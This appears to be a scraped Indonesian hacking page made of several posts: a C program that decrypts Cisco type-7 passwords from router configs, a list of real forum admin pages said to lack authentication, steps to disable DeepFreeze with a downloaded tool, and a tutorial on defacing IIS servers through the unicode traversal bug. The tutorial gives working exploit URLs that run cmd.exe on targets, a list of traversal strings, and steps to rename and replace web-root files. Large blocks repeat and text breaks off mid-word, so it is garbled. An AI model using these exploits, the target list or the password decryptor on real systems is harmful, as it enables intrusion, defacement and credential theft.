if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Selamat mencoba moga2 berguna buat temen.
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Selamat mencoba moga2 berguna buat temen.
ASP
lebih lanjut...
ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp
Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.
Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.
Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :
1. http://www.rvnair.com/bbs/admin/default.asp
2. http://www.equuspages.com/forum/forum2/admin/
3. http://www.joinweb.com/forum/admin/
ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp
Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.
Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.
Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :
1. http://www.rvnair.com/bbs/admin/default.asp
2. http://www.equuspages.com/forum/forum2/admin/
3. http://www.joinweb.com/forum/admin/
Lumpuhkan Deepfreeze
Untuk Uninstall program ini atau melakukan perubahan
yang permanen pada windows, misalnya install program
baru, dibutuhkan password yang di set pada saat
install DeepFreeze.
Tanpa password ini jangan harap anda dapat merubah
setting komputer anda, jadi bisa dibayangkan jikalau
anda lupa password tersebut (mungkin yang anda lakukan
adalah memformat hardisk tersebut).
Namun jika anda mengalaminya jangan khawatir, ikuti
langkah-langkah berikut, mudah-mudahan masalah anda
dapat terselesaikan.
1. Download "XDeepFreeze" di
http://geocities.com/macancrew/xdeepfreeze.zip
2. Ekstrak ke C:\XDeepfreeze
3. Jalankan "Run_Me.exe" yang akan menghasilkan file
"mcr.bat" dan "XDeepFreeze.exe" akan terload.
4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk
menghentikan "frzstate.exe"
5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.
6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")
7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")
8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan.....DeepFreeze tidak berfungsi lagi.
Silahkan install ulang DeepFreeze, ingat dan catat
baik-baik password yang anda gunakan.
Jika anda lupa lagi lakukan kembali cara diatas
yang permanen pada windows, misalnya install program
baru, dibutuhkan password yang di set pada saat
install DeepFreeze.
Tanpa password ini jangan harap anda dapat merubah
setting komputer anda, jadi bisa dibayangkan jikalau
anda lupa password tersebut (mungkin yang anda lakukan
adalah memformat hardisk tersebut).
Namun jika anda mengalaminya jangan khawatir, ikuti
langkah-langkah berikut, mudah-mudahan masalah anda
dapat terselesaikan.
1. Download "XDeepFreeze" di
http://geocities.com/macancrew/xdeepfreeze.zip
2. Ekstrak ke C:\XDeepfreeze
3. Jalankan "Run_Me.exe" yang akan menghasilkan file
"mcr.bat" dan "XDeepFreeze.exe" akan terload.
4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk
menghentikan "frzstate.exe"
5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.
6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")
7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")
8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan.....DeepFreeze tidak berfungsi lagi.
Silahkan install ulang DeepFreeze, ingat dan catat
baik-baik password yang anda gunakan.
Jika anda lupa lagi lakukan kembali cara diatas
Deface NT Web
Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex
Deface NT Web
Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
